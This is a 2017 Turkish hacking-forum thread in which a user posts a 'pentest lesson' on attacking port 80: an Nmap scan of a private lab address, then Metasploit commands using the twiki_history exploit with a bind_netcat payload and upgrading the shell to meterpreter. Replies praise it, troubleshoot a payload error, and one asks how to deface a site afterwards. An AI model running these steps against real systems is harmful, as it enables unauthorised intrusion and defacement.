1. Ayyıldız Tim forumu Hariç Hiç Bir şekilde Rütbeli Oldugunu İddaa edenlere inanmayınız..⠀ Ayyıldız Tim Adına Sizden Bilgi Belge TC Kimlik Vb Evrak İsteyenlere Asla Bilgilerinizi Vermeyiniz.

Pentester Dersi Port 80 Http Hackleme

'Exploitler' forumunda ArslannBey tarafından 12 Temmuz 2017 tarihinde açılan konu

  1. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,394

    Özel Mesaj
    dün pentest dersi mysql hacklemeyi anlatmıştım.

    Bugünde Port 80 HTTP ye saldırıyoruz.Exploit kullanıcaz ardından diğer bazı exploitlerle meterpreter açmaya çalışıcaz. Meterpreter sayesinde komutlarımız genişliycek.



    Saldıracağımız IP adresimiz : 192.168.222.131


    Saldırıyı Yaparken Kullanacağımız Materyaller :

    1 - Nmap

    2 - Metasploit


    Port 80 Apache

    -sS komutu ile Syn taraması yaparak tcp portlarını görüntüledim ve de -sV komutu ile remote servislerin versionlarını görüntüledim.

    Bizim Saldırı Yapacağımız Port Numarası 80 yani HTTP portu.

    [​IMG]

    Evet Görüldüğü Üzere Sistemin 80.Portunda Apache Httpd 2.2.8 ((Ubuntu) DAV/2) mevcut.

    Şimdi Msf Console umuzu açalım e exploitleme işlemine geçelim.

    Kod:
    service postgresql start 

    Kod:
    service mysql start 

    Kod:
    msfconsole 



    Metasploitimize giriş yaptık. Ardından exploitimizin içine use komutuyla giriş yapıyoruz.


    Kod:
    use exploit/unix/webapp/twiki_history


    Kod:
    show options


    yazdığımızda bizden bazı şeyleri doldurmamızı istediğini görüyoruz.

    [​IMG]


    Rhostu girelim.


    Kod:
    set RHOST 192.168.222.131


    Daha sonra payloadda değişim uygulayacağız.

    Kod:
    set payload cmd/unix/bind_netcat


    yazdık.

    Son olarakda

    Kod:
    exploit -j 


    Yazdık ve enterladık.

    [​IMG]


    Görüldüğü Üzere session açıldı şimdi farklı bir exploitle meterpreter'e geçireceğiz.

    kodumuz :

    Kod:
    use post/multi/manage/shell_to_meterpreter


    Evet yazdık farklı bi exp.e geçiş yaptık.

    show options yazıyoruz.

    [​IMG]


    Ve burda bizden SESSION kısmını doldurmamızı istiyor bir önceki hamlemizde twiki history exploitiyle exploit-j komutuyla sistemi exploitlemiştik.şimdi metasploitte o session 1 olarak açıldı yani ilk sessionumuz sessions yazarak öğrenebilirsiniz.
    Şimdi komutumuzu girelim.

    Kod:
    set session 1


    [​IMG]

    Görüldüğü üzre girdik.

    Son hamle olarak

    Kod:
    exploit
    
    yazıyoruz ve enterlıyoruz.


    vee bir session daha açıldı.. tabi bende 3 yazıyor sizde 2 yazması lazım.


    [​IMG]


    Kod:
    sessions -i 3
    yazarak meterpreteri açtım..


    [​IMG]


    Okuyan varsa yazsın :) farklı pentester dersleri gelsinmi. yoksa vuln.assesmenta mı geçeyim






     
  2. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,394

    Özel Mesaj
  3. DraGan Atıldı

    • Guest
    Katılım:
    1 Temmuz 2017
    Mesaj:
    619
    Alınan Beğeniler:
    765

    Özel Mesaj
    Mesela sistemin 80 değilde 67 portu açık ama ona uygun exploit yok, tünelleme yapıp bu engel asilabilirmi?
    Bu arada eline sağlık güzel konu devamını beklerim serinin.
     
    Cyber1adam, ArslannBey ve ERVAH-I-EZEL bunu beğendi.
  4. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,394

    Özel Mesaj
    exploit olmadan yapılabileceğini sanmıyorum.
     
  5. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,394

    Özel Mesaj
    sağolasın
     
    DraGan bunu beğendi.
  6. ERVAH-I-EZEL Atıldı

    • Guest
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,332
    Alınan Beğeniler:
    4,940

    Özel Mesaj
    Harika gidiyorsun devrem eline sağlık. :) Bu konularda tecrübeli ve bilgili gibisin o yüzden bence sonuna kadar devam et. ;)
     
    ArslannBey bunu beğendi.
  7. GaziHann Atıldı

    • Guest
    Katılım:
    26 Mart 2017
    Mesaj:
    307
    Alınan Beğeniler:
    895

    Özel Mesaj
    Eline sağlık güzel anlatım :) Ancak arada kaçırdığın küçük eksikler var onlara dikkat et :)
     
    ERVAH-I-EZEL ve ArslannBey bunu beğendi.
  8. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,394

    Özel Mesaj
    inşallah devrem az buçuk geçmişten araştırmam sayesinde bu kadar var
    (ç)alıntı yapmadıgım ıcın birden yazıyorum o yüzden atlayabildiğim noktalar oluyor hemen hemen herseyi yazmaya çalısıyorum o yüzden kafa karışıyor :) olabilir tabii ki sağolun
     
    ERVAH-I-EZEL ve GaziHann bunu beğendi.
  9. DayiMumin Atıldı

    • Guest
    Katılım:
    12 Temmuz 2017
    Mesaj:
    66
    Alınan Beğeniler:
    64

    Özel Mesaj
    Eline sağlık bu kadar bilgili bir er görmek çok iyi :) Gazihann devremin de dediği gibi bir kaç önemli nokta var ama anlatım iyi .
     
    akose bunu beğendi.
  10. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,394

    Özel Mesaj
    sağolasın
     
    DayiMumin bunu beğendi.
  11. babayoga Atıldı

    • Guest
    Katılım:
    1 Mart 2017
    Mesaj:
    247
    Alınan Beğeniler:
    162

    Özel Mesaj
    devrem bende the value specified for payload is not valid diyor nabıcam
     
  12. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,394

    Özel Mesaj
    payloadı yanlış yazıyor olabilir misin
     
  13. babayoga Atıldı

    • Guest
    Katılım:
    1 Mart 2017
    Mesaj:
    247
    Alınan Beğeniler:
    162

    Özel Mesaj
    HAYIR DEVREM KOPYALAYIP YAPIŞTIRDIM
     
  14. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,394

    Özel Mesaj
    valla hiç hatayı almadım bilemiyorum fakat bir şeyi yanlıs yapıyorsun çünkü ben öyle bi hata almadım internettende araştırabilirsin
     
  15. mhazirlar Guest

    • Guest
    Katılım:
    18 Ağustos 2016
    Mesaj:
    35
    Alınan Beğeniler:
    3

    Özel Mesaj
    Devrem sana bisekilde ulasmam lazim metasploitle ilgili sorularim var sana nasil ulasabilirim
     
  16. Frankiee Guest

    • Guest
    Katılım:
    31 Mayıs 2017
    Mesaj:
    992
    Alınan Beğeniler:
    1,161

    Özel Mesaj
    Ellerine saglik.
     
  17. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,394

    Özel Mesaj
    Burdan sorabilirsin
    sağolasın
     
  18. THE AVENGER Guest

    • Guest
    Katılım:
    10 Ocak 2016
    Mesaj:
    2,799
    Alınan Beğeniler:
    13,263
    Meslek:
    GİZLİ

    Özel Mesaj

    Beklenilen sorulardandır oyüzden bu tarz soru sorduğun için tebrik ederim,Devren yerine ben yanıt vereyim..

    80. port http portudur 80 port çoğu sitede açıktır,eğer kapalı olursa site ile kullanıcı bağlantı kuramaz... Büyük şirketlerde genelde defaulttur yani 80 dir ama güvenliğine düşkün bir şirket ise kendine özel olarak portlar açabilir.. 80 port açık gözüken her sisteme dalamazsınız sebebi şudur 80.port için firewall güvenlik için idaeldir firewall gelen bağlantıyo detect ettiği anda sizi ya time out yapar yapa access denied. Umarım anlaşılır olmuştur.
     
    ArslannBey, DraGan ve TuranFedaisi bunu beğendi.
  19. THE AVENGER Guest

    • Guest
    Katılım:
    10 Ocak 2016
    Mesaj:
    2,799
    Alınan Beğeniler:
    13,263
    Meslek:
    GİZLİ

    Özel Mesaj
    Ayrıyetten tünelleme demişsin Genellikle oda dediğim gibi firewall ve sitenin güvenlik politikalarına bağlıdır.
     
    ArslannBey, TuranFedaisi ve DraGan bunu beğendi.
  20. mhazirlar Guest

    • Guest
    Katılım:
    18 Ağustos 2016
    Mesaj:
    35
    Alınan Beğeniler:
    3

    Özel Mesaj
    Devrem 80 portu open durumundayken exploiti soktuk diyelim sonra index nasil basacaz
     

Bu Sayfayı Paylaş